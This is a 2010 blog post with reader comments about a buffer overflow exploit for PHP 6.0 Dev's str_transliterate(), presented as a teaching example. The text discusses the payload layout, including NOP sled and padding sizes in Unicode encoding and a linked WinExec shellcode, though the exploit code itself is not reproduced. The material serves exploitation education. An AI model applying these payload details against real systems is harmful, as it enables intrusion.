Monday, April 5, 2010

PHP 6.0 Dev str_transliterate(). A great Example !

Hi Folks,
today I wanna point out this nice Exploit on PHP 6.0 Dev. str_transliterate() Buffer Overflow, implemented by Pr0T3cT10n. Why I say that it's a nice exploit ? Well, in my opinion this is a great easy example of Buffer Overflow.. optimal to learn and amazing to show that even new applications own old bugs due to poor security development.
Right now I'm thinking to CeSeNA folks (cesena.ing2.unibo.it), many of them burn to know how to inject a shell code through Buffer Overflow. For all of you interested on the "art of exploitation", I totally suggest to start from this self-commenting example. (Click to Enlarge)



There are no comments regarding shellcodes since I've discussed a lot in the past. I will probably use this exploit during my future talks on Buffer Overflow. Hope you enjoy this didactic exploit.



Original code. (Download here)
Original Vulnerable app (Download here)


*Upgrade:*
Yes, of course: \u4141 is two 'A' , and \u9090 is two NOPs. Basically 20 x (2)NOP = 40 and 256 x (2)A = 512. Thanks to TheLeader for pointing it out .

7 comments:

TheLeader said...

Yep, absolutely cool exploit =]
Was not that easy to figure out the
unicode attack vector though.

Actually the shellcode I wrote is a unicode version of this one:
http://nullbyte.org.il/View_31_WinExec%2017%20bytes%20%28XP%20SP3%20HEB%20x86%29.html

This exploit has a potential of being way more generic and work on multiple platforms, we're planning to rewrite it and release the new one in a few weeks.

Thanks guys!

Marco Ramilli said...

@TheLeader. I totally agree with you when you say

"This exploit has a potential of being way more generic and work on multiple platforms"

I am looking forward to see next release !

Thanks for follow me.

TheLeader said...

Another interesting thing in your post I noticed right now - the buffer is actually 512 x 'A', the nops are 40 x 0x90 - that is because they are unicode encoded and each char = 2 bytes.

Also because of the unicode attack vector, every 2 bytes are shifted - which makes the exploit a little bit harder to understand (esp. the shellcode part) but I agree it is a nice example to learn from.

Marco Ramilli said...

@TheLeader

"Another interesting thing in your post I noticed right now - the buffer is actually 512 x 'A', the nops are 40 x 0x90 - that is because they are unicode encoded and each char = 2 bytes."

HaHaHa, Yes of course ! The image not fully correct. since \u4141 is double 'A' . That's right ! Thank you for the notice. I've been very busy today and the last 2 post have been very fuggitive

TheLeader said...

Well dam, seems I haven't been too much focused either.
Since it is unicode, it's not a double 'A'.

Checking the unicode table reveals "\u4141" is rather this little unicode character buddy - '䅁'.

Sorry, Too much ASCII exploitation makes these interpretations automatic - after all security researchers are human beings =]

TheLeader said...

NVM, The in-memory representation of that character is 0x41, 0x41 which also represents a double 'A'.

So you can just ignore my last comment (what happens when I stay awake 'till 4AM ;] ).

Marco Ramilli said...

Yea, I belive it's a common evil :)